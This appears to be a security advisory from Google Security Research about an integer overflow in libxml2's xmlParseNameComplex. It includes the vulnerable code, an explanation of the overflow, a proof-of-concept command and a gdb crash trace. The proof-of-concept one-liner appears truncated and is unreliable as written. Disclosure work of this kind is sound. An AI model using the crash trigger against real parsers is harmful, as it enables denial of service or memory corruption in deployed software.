libxml2: Integer overflow in xmlParseNameComplex libxml2 is vulnerable to an integer overflow in `xmlParseNameComplex` when an attribute list has a very long name (name is >= 2**32 characters). ``` static const xmlChar *xmlParseNameComplex(xmlParserCtxtPtr ctxt) { int len = 0, l; [...] return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len)); } ``` If the name is greater than or equal to 2**32 characters, then `len` overflows. The calculation for the second argument to xmlDictLookup (`ctxt->input->cur - len`) will point to an address outside of the buffer such as adding 0x80000000 to `cur`. Exploiting this issue using static XML requires that the `XML_PARSE_HUGE` flag is used to disable hardcoded parser limits. Though similar to Felix’s report [\(CVE-2022-29824\)](https://gitlab.gnome.org/GNOME/libxml2/-/issues/351) it may be possible to trigger without the flag using XSLT or xpath though I didn’t look into this. _Note: XML_PARSE_HUGE looks very brittle in general. Signed 32-bit integers are widely used as sizes/offsets throughout the codebase, a lot of the helper functions don’t handle inputs larger than 4GB correctly and fuzzers won’t trigger these edge cases. Maybe that flag should include a security warning? Some security critical projects like xmlsec enable it by default (https://github.com/lsh123/xmlsec/commit/3786af10953630cd2bb2b57ce31c575f025048a8) which seems risky._ Proof of Concept: ``` $ python3 -c 'print("")' > name_big.xml $ ./xmllint --huge /tmp/name_big.xml Program received signal SIGSEGV, Segmentation fault. __strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77 77 ../sysdeps/x86_64/multiarch/strlen-evex.S: No such file or directory. (gdb) bt #0 __strlen_evex () at ../sysdeps/x86_64/multiarch/strlen-evex.S:77 #1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e , len=-2147483648) at /usr/local/google/home/maddiestone/libxml2/dict.c:878 #2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617 #3 0x00007ffff7e65395 in xmlParseName (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3682 #4 0x00007ffff7e6f27e in xmlParseAttributeListDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:6729 #5 0x00007ffff7e71a00 in xmlParseMarkupDecl (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:7754 #6 0x00007ffff7e79ed1 in xmlParseInternalSubset (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:9407 #7 0x00007ffff7e79a16 in xmlParseDocument (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:12165 #8 0x00007ffff7e819fe in xmlDoRead (ctxt=0x421750, URL=0x0, encoding=0x0, options=4784128, reuse=0) at /usr/local/google/home/maddiestone/libxml2/parser.c:17044 #9 0x00007ffff7e81ad7 in xmlReadFile (filename=0x7fffffffdec7 "../qname_big.xml", encoding=0x0, options=4784128) at /usr/local/google/home/maddiestone/libxml2/parser.c:17109 #10 0x000000000040a135 in parseAndPrintFile (filename=0x7fffffffdec7 "../qname_big.xml", rectxt=0x0) at /usr/local/google/home/maddiestone/libxml2/xmllint.c:2366 #11 0x0000000000407574 in main (argc=3, argv=0x7fffffffdac8) at /usr/local/google/home/maddiestone/libxml2/xmllint.c:3757 (gdb) up #1 0x00007ffff7e3a374 in xmlDictLookup (dict=0x421a50, name=0x7ffff795602e , len=-2147483648) at /usr/local/google/home/maddiestone/libxml2/dict.c:878 878 l = strlen((const char *) name); (gdb) up #2 0x00007ffff7e6607a in xmlParseNameComplex (ctxt=0x421750) at /usr/local/google/home/maddiestone/libxml2/parser.c:3617 3617 return (xmlDictLookup(ctxt->dict, ctxt->input->cur - len, len)); (gdb) p/x len $5 = 0x80000000 (gdb) p/x $_siginfo $6 = {si_signo = 0xb, si_errno = 0x0, si_code = 0x1, _sifields = {_pad = {0xf795602e, 0x7fff, 0x0 }, _kill = {si_pid = 0xf795602e, si_uid = 0x7fff}, _timer = {si_tid = 0xf795602e, si_overrun = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _rt = {si_pid = 0xf795602e, si_uid = 0x7fff, si_sigval = {sival_int = 0x0, sival_ptr = 0x0}}, _sigchld = {si_pid = 0xf795602e, si_uid = 0x7fff, si_status = 0x0, si_utime = 0x0, si_stime = 0x0}, _sigfault = {si_addr = 0x7ffff795602e, _addr_lsb = 0x0, _addr_bnd = {_lower = 0x0, _upper = 0x0}}, _sigpoll = { si_band = 0x7ffff795602e, si_fd = 0x0}}} (gdb) p/x ctxt->input->cur $7 = 0x7fff7795602e ``` Related CVE Numbers: CVE-2022-29824,CVE-2022-40303. Found by: Google Security Research